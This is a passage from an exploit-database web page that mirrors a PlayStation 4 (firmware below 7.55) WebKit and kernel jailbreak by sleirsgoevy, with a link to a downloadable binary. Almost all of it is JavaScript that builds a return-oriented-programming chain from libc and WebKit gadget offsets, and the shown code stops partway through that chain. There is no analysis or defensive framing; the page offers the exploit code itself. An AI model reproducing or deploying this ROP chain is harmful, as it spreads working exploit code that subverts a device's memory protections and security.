BlackAnalytica.com
Menu
Services
Founders
Identity check
Exploit DB
Threats
Login
Registration
Sony Playstation 4 (PS4) < 7.55 - ˙Jailbreak˙ Webkit / Kernel Loader ˙SOCK_RAW˙ ˙IP6_EXTHDR_CHECK˙
Author : sleirsgoevy (2021-03-17)
Platform : Hardware
Copy to Clipboard
// EDB-Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/49664.zip var ropchain_array = new Uint32Array(337302); var ropchain = read_ptr_at(addrof(ropchain_array)+0x10); var ropchain_offset = 2; function set_gadget(val) { ropchain_array[ropchain_offset++] = val | 0; ropchain_array[ropchain_offset++] = (val / 4294967296) | 0; } function set_gadgets(l) { for(var i = 0; i < l.length; i++) set_gadget(l[i]); } function db(data) { for(var i = 0; i < data.length; i++) ropchain_array[ropchain_offset++] = data[i]; } var main_ret = malloc(8); var printf_buf = malloc(65536); var __swbuf_addr = 0; // STUB set_gadgets([ libc_base+763368, //pop rcx ropchain+65720, //rdi_bak libc_base+533450, //mov [rcx], rdi libc_base+144605, //pop rdi ropchain+65680, //stack_bottom libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax ropchain+112, //ret_addr libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+1221872, //_main //ret_addr: libc_base+782311, //pop rsp ropchain+65680 //stack_bottom ]); //_ps4_printf_buffer: var printf_buf_offset = 128; set_gadget(printf_buf); //_ps4_printf_fd: db([4294967295, 4294967295]); // -0x1 //stack: ropchain_offset += 16384; //stack_bottom: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi main_ret, webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //rdi_bak: //_pivot_back_addr: db([0, 0]); // 0x0 set_gadgets([ pivot_addr, //___builtin_bswap16: libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+65800, //L1 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+65896, //L2 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+65928, //L5 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L5: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+66032, //L8 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+66016, //L6 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+66192, //L12 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+66160, //L10 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66176, //L11 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L10: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+66248, //L14 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L14: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+66376, //L16 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+66392, //L17 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66360, //L15 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L15: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L16: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L17: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+66552, //L21 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66520, //L19 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66536, //L20 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L18: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L19: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L20: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L21: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+66656, //L23 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66640, //L22 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L22: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L23: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L24: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L25: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+66864, //L28 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66848, //L27 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L26: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L27: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L28: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+66968, //L30 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66952, //L29 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L29: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L30: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+67048, //L31 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L31: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L33: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+67168, //L36 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+67152, //L34 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L34: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L36: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+67328, //L40 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+67296, //L38 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67312, //L39 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L37: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L38: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L39: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L40: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+67384, //L42 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L42: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+67512, //L44 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+67528, //L45 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67496, //L43 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L43: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L44: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L45: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+67688, //L49 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67656, //L47 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67672, //L48 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L46: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L47: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L48: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L49: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+67792, //L51 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67776, //L50 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L50: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L51: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L52: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L53: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+67992, //L56 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67976, //L55 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L54: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L55: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L56: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68096, //L58 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+68080, //L57 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L57: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L58: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68208, //L61 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+68192, //L60 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L59: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L60: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L61: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68272, //L63 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+763368 //pop rcx ]); //L63: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+68328, //L64 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L64: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+68480, //L67 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68496, //L68 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+68464, //L66 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L66: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L67: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L68: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+68608, //L69 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68640, //L71 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+68624, //L70 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L69: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L70: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L71: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+68744, //L72 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68760, //L73 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L72: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L73: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+68880, //L74 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68864, //L75 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L75: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L74: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+68968, //L77 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+68952, //L76 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L76: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L77: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69072, //L78 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69088, //L79 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L78: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L79: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69208, //L80 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69192, //L81 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L81: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L80: db([0, 0]); // 0x0 //___builtin_bswap32: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69280, //L83 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L83: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+69376, //L84 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69408, //L87 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L84: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L86: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L87: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+69512, //L90 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69496, //L88 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L88: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L90: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+69688, //L93 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69704, //L94 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69656, //L91 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+69672, //L92 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L91: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L92: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L93: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L94: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+69800, //L96 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+69784, //L95 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L95: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L96: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L97: db([24, 0]); // 0x18 set_gadget(libc_base+763368,); //pop rcx //L98: db([24, 0]); // 0x18 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+70000, //L101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+69984, //L100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L99: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L100: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L101: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+70104, //L103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+70088, //L102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L102: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L103: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+70192, //L104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L104: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L106: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+70312, //L109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+70296, //L107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L107: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L109: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+70488, //L112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+70504, //L113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+70456, //L110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+70472, //L111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L110: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L111: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L112: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L113: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+70600, //L115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+70584, //L114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L114: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L115: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L117: db([16711680, 0]); // 0xff0000 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+70712, //L118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L118: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L120: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L121: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+70944, //L124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+70928, //L123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L122: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L123: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L124: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+71048, //L126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+71032, //L125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L126: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+71104, //L128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L128: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+71160, //L129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L129: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+71272, //L131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L131: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L133: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+71392, //L136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+71376, //L134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L134: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L136: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+71568, //L139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+71584, //L140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+71536, //L137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+71552, //L138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L137: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L138: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L139: db([0, 0]); // 0x0 